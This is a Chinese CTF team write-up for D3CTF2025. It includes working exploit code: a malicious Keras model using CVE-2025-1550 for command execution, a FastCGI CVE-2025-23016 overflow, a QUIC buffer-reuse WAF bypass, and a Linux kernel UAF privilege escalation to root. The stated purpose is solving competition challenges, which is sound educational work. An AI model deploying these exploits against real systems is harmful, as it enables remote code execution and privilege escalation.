本次 D3CTF2025,我们 Polaris 战队排名第 12 。
|
|
|
---|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
WEB
d3model
源码如下:
import kerasfrom flask import Flask, request, jsonifyimport osdef is_valid_model(modelname): try: keras.models.load_model(modelname) except:return Falsereturn Trueapp = Flask(__name__)@app.route('/', methods=['GET'])def index():return open('index.html').read()@app.route('/upload', methods=['POST'])def upload_file():if'file' not in request.files:return jsonify({'error': 'No file part'}), 400 file = request.files['file']if file.filename == '':return jsonify({'error': 'No selected file'}), 400 MAX_FILE_SIZE = 50 * 1024 * 1024 # 50MB file.seek(0, os.SEEK_END) file_size = file.tell() file.seek(0)if file_size > MAX_FILE_SIZE:return jsonify({'error': 'File size exceeds 50MB limit'}), 400 filepath = os.path.join('./', 'test.keras')if os.path.exists(filepath): os.remove(filepath) file.save(filepath)if is_valid_model(filepath):return jsonify({'message': 'Model is valid'}), 200else:return jsonify({'error': 'Invalid model file'}), 400if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)
requirements告诉我们keras==3.8.0,查了一下发现存在CVE漏洞。
cve-2025-1550
,可以参考如下文章复现:
https://blog.huntr.com/inside-cve-2025-1550-remote-code-execution-via-keras-models
这里直接给出exp:
import zipfileimport jsonfrom keras.models import Sequentialfrom keras.layers import Denseimport numpy as npimport osmodel_name = "model.keras"x_train = np.random.rand(100, 28 * 28)y_train = np.random.rand(100)model = Sequential([Dense(1, activation='linear', input_dim=28 * 28)])model.compile(optimizer='adam', loss='mse')model.fit(x_train, y_train, epochs=5)model.save(model_name)with zipfile.ZipFile(model_name, "r") as f: config = json.loads(f.read("config.json").decode())config["config"]["layers"][0]["module"] = "keras.models"config["config"]["layers"][0]["class_name"] = "Model"config["config"]["layers"][0]["config"] = {"name": "mvlttt","layers": [ {"name": "mvlttt","class_name": "function","config": "Popen","module": "subprocess","inbound_nodes": [{"args": [["bash", "-c", "env > index.html"]], "kwargs": {"bufsize": -1}}] }],"input_layers": [["mvlttt", 0, 0]],"output_layers": [["mvlttt", 0, 0]]}with zipfile.ZipFile(model_name, 'r') as zip_read: with zipfile.ZipFile(f"tmp.{model_name}", 'w') as zip_write:for item in zip_read.infolist():if item.filename != "config.json": zip_write.writestr(item, zip_read.read(item.filename))os.remove(model_name)os.rename(f"tmp.{model_name}", model_name)with zipfile.ZipFile(model_name, "a") as zf: zf.writestr("config.json", json.dumps(config))print("[+] Malicious model ready")
这里不出网,我们写文件就行。直接写到index.html后刷新一下即可。
tidy quic
源码如下:
package mainimport ("bytes""errors""github.com/libp2p/go-buffer-pool""github.com/quic-go/quic-go/http3""io""log""net/http""os")var p pool.BufferPoolvar ErrWAF = errors.New("WAF")func main() { go func() { err := http.ListenAndServeTLS(":8080", "./server.crt", "./server.key", &mux{}) log.Fatalln(err) }() go func() { err := http3.ListenAndServeQUIC(":8080", "./server.crt", "./server.key", &mux{}) log.Fatalln(err) }() select {}}type mux struct {}func (*mux) ServeHTTP(w http.ResponseWriter, r *http.Request) {if r.Method == http.MethodGet { _, _ = w.Write([]byte("Hello D^3CTF 2025,I'm tidy quic in web."))return }if r.Method != http.MethodPost { w.WriteHeader(400)return } var buf []byte length := int(r.ContentLength)if length == -1 { var err error buf, err = io.ReadAll(textInterrupterWrap(r.Body))if err != nil {if errors.Is(err, ErrWAF) { w.WriteHeader(400) _, _ = w.Write([]byte("WAF")) } else { w.WriteHeader(500) _, _ = w.Write([]byte("error")) }return } } else { buf = p.Get(length) defer p.Put(buf) rd := textInterrupterWrap(r.Body) i := 0for { n, err := rd.Read(buf[i:])if err != nil {if errors.Is(err, io.EOF) {break } elseif errors.Is(err, ErrWAF) { w.WriteHeader(400) _, _ = w.Write([]byte("WAF"))return } else { w.WriteHeader(500) _, _ = w.Write([]byte("error"))return } } i += n } }if !bytes.HasPrefix(buf, []byte("I want")) { _, _ = w.Write([]byte("Sorry I'm not clear what you want."))return } item := bytes.TrimSpace(bytes.TrimPrefix(buf, []byte("I want")))if bytes.Equal(item, []byte("flag")) { _, _ = w.Write([]byte(os.Getenv("FLAG"))) } else { _, _ = w.Write(item) }}type wrap struct { io.ReadCloser ban []byte idx int}func (w *wrap) Read(p []byte) (int, error) { n, err := w.ReadCloser.Read(p)if err != nil && !errors.Is(err, io.EOF) {return n, err }for i := 0; i < n; i++ {if p[i] == w.ban[w.idx] { w.idx++if w.idx == len(w.ban) {return n, ErrWAF } } else { w.idx = 0 } }return n, err}func textInterrupterWrap(rc io.ReadCloser) io.ReadCloser {return &wrap{ rc, []byte("flag"), 0, }}
这里主要的思考点在于I want
后怎么加上flag
,有WAF存在。
这里注意到BufferPool的存在,存在BufferPool的内存复用。
先是利用发送123456flag
,再发送I want
,由于BufferPool没有清空,使I want
覆盖掉之前的123456
,从而构造出I wantflag
package mainimport ("bytes""crypto/tls""fmt""io""log""net/http""sync""time" quic "github.com/quic-go/quic-go" // 明确导入quic包"github.com/quic-go/quic-go/http3")const ( targetURL = "https://35.220.136.70:31779" polluteData = "111111flag" // 污染数据 realPayload = "I want" // 有效载荷)func main() { // 创建优化的HTTP/3客户端 client := &http.Client{ Transport: &http3.RoundTripper{ TLSClientConfig: &tls.Config{ InsecureSkipVerify: true, NextProtos: []string{"h3"}, // 必须指定ALPN }, QUICConfig: &quic.Config{ // 修正字段名为大写QUICConfig MaxIncomingStreams: 1000, // 提高并发能力 }, }, Timeout: 15 * time.Second, } defer client.CloseIdleConnections() var wg sync.WaitGroup // 阶段1:增强型缓冲池污染 fmt.Println("[*] 启动HTTP/3缓冲池污染攻击...") start := time.Now()for i := 0; i < 200; i++ { // 高频并发污染 wg.Add(1) go func() { defer wg.Done() req, _ := http.NewRequest("POST", targetURL, bytes.NewBufferString(polluteData)) client.Do(req) }() } wg.Wait() // 阶段2:精确内存布局触发 fmt.Printf("[*] 污染完成 (耗时: %v)n[*] 触发组合攻击...n", time.Since(start)) time.Sleep(800 * time.Millisecond) // 关键时间窗口 // 使用Content-Length技巧 body := io.NopCloser(bytes.NewReader([]byte(realPayload))) req, _ := http.NewRequest("POST", targetURL, body) req.ContentLength = 10 // 故意设置大于实际长度 resp, err := client.Do(req)if err != nil { log.Fatalf("请求失败: %v", err) } defer resp.Body.Close() // 结果分析 response, _ := io.ReadAll(resp.Body)if bytes.Contains(response, []byte("FLAG")) { fmt.Printf("[+] 攻击成功! 状态码: %dnFLAG: %sn", resp.StatusCode, extractFlag(response)) } else { fmt.Printf("[-] 攻击失败 状态码: %dn响应: %sn", resp.StatusCode, truncate(string(response))) }}func extractFlag(data []byte) string { flagStart := bytes.Index(data, []byte("FLAG{"))if flagStart == -1 {return"" }return string(data[flagStart : bytes.IndexByte(data[flagStart:], '}')+1])}func truncate(s string) string {if len(s) > 100 {return s[:100] + "..." }return s}
d3ctf{YOu-sAld_RlGhT-BUt-y0u-sH0Uld_p1Ay-G3nsH1n_imPact2}
MISC
d3image
AI的图像隐写题
加载一个预训练的可逆神经网络模型,对隐写图像进行小波变换,神经网络逆变换提取隐写获得flag
import torchimport torch.nn as nnimport numpy as npfrom PIL import Imageimport torchvision.transforms as Timport zlibfrom reedsolo import RSCodec# 从utils.py提取必要函数class DWT: def __init__(self): self.requires_grad = False def forward(self, x): x01 = x[:, :, 0::2, :] / 2 x02 = x[:, :, 1::2, :] / 2 x1 = x01[:, :, :, 0::2] x2 = x02[:, :, :, 0::2] x3 = x01[:, :, :, 1::2] x4 = x02[:, :, :, 1::2] x_LL = x1 + x2 + x3 + x4 x_HL = -x1 - x2 + x3 + x4 x_LH = -x1 + x2 - x3 + x4 x_HH = x1 - x2 - x3 + x4return torch.cat((x_LL, x_HL, x_LH, x_HH), 1)class IWT: def __init__(self): self.requires_grad = False def forward(self, x): r = 2 in_batch, in_channel, in_height, in_width = x.size() out_batch, out_channel, out_height, out_width = in_batch, int( in_channel / (r ** 2)), r * in_height, r * in_width x1 = x[:, 0:out_channel, :, :] / 2 x2 = x[:, out_channel:out_channel * 2, :, :] / 2 x3 = x[:, out_channel * 2:out_channel * 3, :, :] / 2 x4 = x[:, out_channel * 3:out_channel * 4, :, :] / 2 h = torch.zeros([out_batch, out_channel, out_height, out_width]).float().to(x.device) h[:, :, 0::2, 0::2] = x1 - x2 - x3 + x4 h[:, :, 1::2, 0::2] = x1 - x2 + x3 - x4 h[:, :, 0::2, 1::2] = x1 + x2 - x3 - x4 h[:, :, 1::2, 1::2] = x1 + x2 + x3 + x4return hdef bytearray_to_text(x): try: rs = RSCodec(128) text = rs.decode(x) text = zlib.decompress(text[0])return text.decode("utf-8") except:return Falsedef bits_to_bytearray(bits): ints = [] bits = np.array(bits) bits = 0 + bits bits = bits.tolist()for b in range(len(bits) // 8): byte = bits[b * 8:(b + 1) * 8] ints.append(int(''.join([str(bit) for bit in byte]), 2))return bytearray(ints)# 从block.py提取并修改INV_block - 修复通道问题class ResidualDenseBlock_out(nn.Module): def __init__(self, channel=12, hidden_size=32, bias=True): super(ResidualDenseBlock_out, self).__init__() self.channel = channel self.hidden_size = hidden_size self.conv1 = nn.Conv2d(self.channel, self.hidden_size, 3, 1, 1, bias=bias) self.conv2 = nn.Conv2d(self.channel + self.hidden_size, self.hidden_size, 3, 1, 1, bias=bias) self.conv3 = nn.Conv2d(self.channel + 2 * self.hidden_size, self.hidden_size, 3, 1, 1, bias=bias) self.conv4 = nn.Conv2d(self.channel + 3 * self.hidden_size, self.hidden_size, 3, 1, 1, bias=bias) self.conv5 = nn.Conv2d(self.channel + 4 * self.hidden_size, self.channel, 3, 1, 1, bias=bias) self.lrelu = nn.LeakyReLU(inplace=True) def forward(self, x): x1 = self.lrelu(self.conv1(x)) x2 = self.lrelu(self.conv2(torch.cat((x, x1), 1))) x3 = self.lrelu(self.conv3(torch.cat((x, x1, x2), 1))) x4 = self.lrelu(self.conv4(torch.cat((x, x1, x2, x3), 1))) x5 = self.conv5(torch.cat((x, x1, x2, x3, x4), 1))return x5class INV_block(nn.Module): def __init__(self, input_channels=24, clamp=2.0): super().__init__() self.input_channels = input_channels self.clamp = clamp# 每个部分应该是输入通道数的一半 self.split_channels = input_channels // 2 self.r = ResidualDenseBlock_out(channel=self.split_channels) self.y = ResidualDenseBlock_out(channel=self.split_channels) self.f = ResidualDenseBlock_out(channel=self.split_channels) def e(self, s):return torch.exp(self.clamp * 2 * (torch.sigmoid(s) - 0.5)) def inverse(self, y):# 将输入分成两个相等部分 y1, y2 = (y.narrow(1, 0, self.split_channels), y.narrow(1, self.split_channels, self.split_channels)) s1 = self.r(y1) t1 = self.y(y1) e_s1 = self.e(s1) x2 = (y2 - t1) / e_s1 t2 = self.f(x2) x1 = y1 - t2return torch.cat((x1, x2), 1)# 从d3net.py修改D3net - 使用原始键名结构class D3net(nn.Module): def __init__(self): super().__init__()# 第一个块的输入通道数为24 self.inv1 = INV_block(input_channels=24) self.inv2 = INV_block(input_channels=24) self.inv3 = INV_block(input_channels=24) self.inv4 = INV_block(input_channels=24) self.inv5 = INV_block(input_channels=24) self.inv6 = INV_block(input_channels=24) self.inv7 = INV_block(input_channels=24) self.inv8 = INV_block(input_channels=24) def inverse(self, x):# 逆序执行逆变换 x = self.inv8.inverse(x) x = self.inv7.inverse(x) x = self.inv6.inverse(x) x = self.inv5.inverse(x) x = self.inv4.inverse(x) x = self.inv3.inverse(x) x = self.inv2.inverse(x) x = self.inv1.inverse(x)return x# 图像预处理def transform2tensor(img_path, device): transform = T.Compose([ T.CenterCrop((720, 1280)), T.ToTensor(), ]) img = Image.open(img_path).convert('RGB')return transform(img).unsqueeze(0).to(device)def decode_steg(steg_path, model_path, device):# 禁用梯度计算以节省内存 torch.set_grad_enabled(False)# 加载模型 d3net = D3net() state_dicts = torch.load(model_path, map_location=device)# 修复键名不匹配问题 network_state_dict = {}for k, v in state_dicts['net'].items():# 移除"model."前缀if k.startswith('model.'): new_key = k[6:] # 移除前6个字符("model.")else: new_key = k network_state_dict[new_key] = v# 加载修正后的状态字典 d3net.load_state_dict(network_state_dict) d3net.eval().to(device)# 加载隐写图像 steg = transform2tensor(steg_path, device)print(f"Loaded steg image: {steg.shape}")# 小波变换 dwt = DWT() steg_dwt = dwt.forward(steg)print(f"After DWT: {steg_dwt.shape}")# 创建一个与steg_dwt相同形状的零张量,作为负载部分的初始估计 zeros = torch.zeros_like(steg_dwt)# 将封面图像的DWT特征与零张量拼接,形成24通道 input_to_net = torch.cat([steg_dwt, zeros], dim=1)print(f"Input to network: {input_to_net.shape}")# 可逆网络反向传播恢复负载 recovered = d3net.inverse(input_to_net)print(f"After inverse network: {recovered.shape}")# 提取后12通道作为负载的DWT特征 payload_dwt = recovered.narrow(1, 12, 12)print(f"Payload DWT: {payload_dwt.shape}")# 逆小波变换恢复二值图像 iwt = IWT() payload = iwt.forward(payload_dwt)print(f"After IWT: {payload.shape}")# 二值化处理 binary_payload = (payload > 0.5).float().squeeze(0) bits = binary_payload.detach().cpu().numpy().flatten().astype(int).tolist()print(f"Extracted bits: {len(bits)}")# 比特流转文本 candidates = {} byte_array = bits_to_bytearray(bits)print(f"Byte array length: {len(byte_array)}")# 尝试不同分隔符for sep in [b'x00x00x00x00', b'x00x00', b'x00']: parts = byte_array.split(sep)for i, part in enumerate(parts): text = bytearray_to_text(part)if text:print(f"Found candidate: {text[:20]}... (part {i+1}/{len(parts)})") candidates[text] = candidates.get(text, 0) + 1# 返回最可能的候选if not candidates:return"Flag not found"return max(candidates.items(), key=lambda x: x[1])[0]if __name__ == '__main__':# 智能设备选择if torch.cuda.is_available(): device = torch.device("cuda")print("Using GPU acceleration")else: device = torch.device("cpu")print("Using CPU") steg_image = "./steg.png" model_weights = "./magic.potions"print(f"Decoding steg image: {steg_image}")print(f"Using model weights: {model_weights}") flag = decode_steg(steg_image, model_weights, device)print(f"nExtracted Flag: {flag}")
最终flag: d3ctf{cre4te_by_M1aoo0bin_&&_l0v3_from_D3}
d3rpg-singin
进入游戏:
在初始页面右边查看到公告:
初始页面左上角:
在老程序员处得到密码
在房子的下楼楼梯口需要输入密码,我们选择刚得到的密码
进去后页面如下:
然后进入右下角的洞
去找卖酒的买东西
买255的会得到RMB
2RMB的flag:
这只是其中一段flag,想到公告说
每个用户只能持有一字节,
尝试手动注入打栈溢出
买一百多次255的,会出现:
0x7f就是127,得买至少127次
得到VzNsYzBtM183b19kM19ScEdfVzByMWQ=
base64解密
得到flag:W3lc0m3_7o_d3_RpG_W0r1d
PWN
d3cgi
漏洞就是 CVE-2025-23016,按照网上文章改改EXP就能打通。
#!/usr/bin/env python3# -*- coding:utf-8 -*-from pwn import *context.clear(arch='amd64', os='linux', log_level='debug')"""typedef struct { unsigned char version; unsigned char type; unsigned char requestIdB1; unsigned char requestIdB0; unsigned char contentLengthB1; unsigned char contentLengthB0; unsigned char paddingLength; unsigned char reserved;} FCGI_Header;"""def makeHeader(type, requestId, contentLength, paddingLength): header = p8(1) + p8(type) + p16(requestId) + p16(contentLength)[::-1] + p8(paddingLength) + p8(0)return header"""typedef struct { unsigned char roleB1; unsigned char roleB0; unsigned char flags; unsigned char reserved[5];} FCGI_BeginRequestBody;"""def makeBeginReqBody(role, flags):return p16(role)[::-1] + p8(flags) + b"x00" * 5header = makeHeader(9, 0, 900, 0)host = '35.241.98.126'port = 30830 sh = remote(host, port)sh.send(makeHeader(1, 1, 8, 0) + makeBeginReqBody(1, 0) + header + (p8(0x13) + p8(0x13) + b"b" * 0x26)*9 + p8(0) * (2 *2)+ (p8(0x13) + p8(0x13) + b"b" * 0x26))sh.close()time.sleep(1)sh = remote(host, port)sh.send(makeHeader(1, 1, 8, 0) + makeBeginReqBody(1, 0) + header + (p8(0x13) + p8(0x13) + b"b" * 0x26)*9 + p32(0xffffffff) + p32(0xffffffff) + b"a" * (0x190) + b" /;cat flag >&3".ljust(20,b' ') +p32(0) * 3 + p32(0x80490C0))sh.interactive()
d3kheap2
直接给了 UAF ,构造二级 pipe_buffer 实现任意地址读写即可。
#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <fcntl.h>#include <sys/ioctl.h>#define F_SETPIPE_SZ 1031#define ADD 0x3361626E#define DEL 0x74747261int fd;#define MAX_PIPE 250int pipe_fds[MAX_PIPE * 2][2];int parent_index = -1;int child_index = -1;size_t vmemmap_base;size_t page_offset_base = 0xffff800000000000;size_t kernel_base = 0;size_t current_task = 0;size_t current_cred = 0;/* Get real address */#define REAL(addr) (kernel_base - 0xffffffff81000000 + (addr))struct pipe_buffer { char * page; unsigned int offset; unsigned int len; // No-use};size_t read_word(size_t addr){ struct pipe_buffer l_pipe; size_t result = -1; l_pipe.page = (char*)(vmemmap_base+((((addr)&(~0xfff))-page_offset_base)/0x1000)*0x40); l_pipe.len = 0x1000; l_pipe.offset = (addr)&(0xfff); write(pipe_fds[parent_index][1], &l_pipe, sizeof(l_pipe));read(pipe_fds[child_index][0], &result, sizeof(result));read(pipe_fds[parent_index][0], &l_pipe, sizeof(l_pipe)); // clear cachereturn result;}size_t write_word(size_t addr, size_t value){ struct pipe_buffer l_pipe; l_pipe.page = (char*)(vmemmap_base+((((addr)&(~0xfff))-page_offset_base)/0x1000)*0x40); l_pipe.len = (addr)&(0xfff); l_pipe.offset = 0; write(pipe_fds[parent_index][1], &l_pipe, sizeof(l_pipe)); write(pipe_fds[child_index][1], &value, sizeof(value));read(pipe_fds[parent_index][0], &l_pipe, sizeof(l_pipe)); // clear cachereturn 0;}#define INIT_TASK 0xFFFFFFFF82C0D540#define TASK_OFFSET 0x478#define PID_OFFSET 0x548#define PTR_CRED_OFFSET 0x718size_t get_current_task(){ size_t task = REAL(INIT_TASK); size_t result = 0; int i = 0; int pid; int current_task_pid = getpid();while(result == 0 && i++ < 128) { task = read_word(task + TASK_OFFSET + 8) - TASK_OFFSET;printf("task: %#lxn", task);if(task == INIT_TASK) {break; } pid = read_word(task + PID_OFFSET);printf("pid: %dn", pid);if(pid == current_task_pid) { result = task; } }return result;}int main(){ size_t index; char buf[0x4000]; int i; setbuf(stdout, NULL); fd = open("/proc/d3kheap2", O_RDWR);if(fd == -1) { perror("open");exit(EXIT_FAILURE); }for (i = 0; i < MAX_PIPE * 2; i++) { pipe(pipe_fds[i]); }for (i = 0; i < 0x100; i++) { index = i; ioctl(fd, ADD, &index); }for (i = 0; i < 0x100; i++) { index = i; ioctl(fd, DEL, &index); }for (i = 0; i < MAX_PIPE; i++) { fcntl(pipe_fds[i][1], F_SETPIPE_SZ, 0x1000 * 30); }for (i = 0; i < 0x100; i++) { index = i; ioctl(fd, DEL, &index); }for (i = MAX_PIPE; i < MAX_PIPE * 2; i++) { memset(buf, 0, 0x1000); write(pipe_fds[i][1], buf, 0x28); }for (i = 0; i < MAX_PIPE; i++) { memset(buf, 0, 0x1000); write(pipe_fds[i][1], buf, 0xf00+i); }for (i = MAX_PIPE; i < MAX_PIPE * 2; i++) { memset(buf, 0, 0x1000);read(pipe_fds[i][0], buf, 0x28);if (*(size_t*)buf) { parent_index = i; child_index = *(int*)(buf+0xc) & 0xff; kernel_base = *(size_t*)(buf+0x10) - 0x141f9c8; vmemmap_base = *(size_t*)(buf+0) & (~0xfffffff);printf("parent_index: %dn", parent_index);printf("child_index: %dn", child_index);printf("kernel_base: 0x%lxn", kernel_base);printf("vmemmap_base: 0x%lxn", vmemmap_base);break; } }if (parent_index == -1 || child_index == -1) {printf("Not Foundn");exit(EXIT_FAILURE); }for (i = 0; i < 0x80000; i++) {if (read_word(REAL(0xffffffff82d3d670)) == 0x6f6d2f6e6962732f) {printf("page_offset_base: 0x%lxn", page_offset_base);break; } page_offset_base += 0x10000000; }printf("getpid: 0x%xn", getpid()); current_task = get_current_task();printf("current_task: 0x%lxn", current_task); current_cred = read_word(current_task + PTR_CRED_OFFSET);printf("current_cred: 0x%lxn", current_cred);for (i = 0; i < 4; i++) { write_word(current_cred+8+i*8, 0); } system("/bin/sh");return 0;}
文末:
欢迎师傅们加入我们:
星盟安全团队纳新群1:222328705
星盟安全团队纳新群2:346014666
有兴趣的师傅欢迎一起来讨论!
PS:团队纳新简历投递邮箱:
责任编辑:@Elite
原文始发于微信公众号(星盟安全):D3CTF2025 Writeup
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论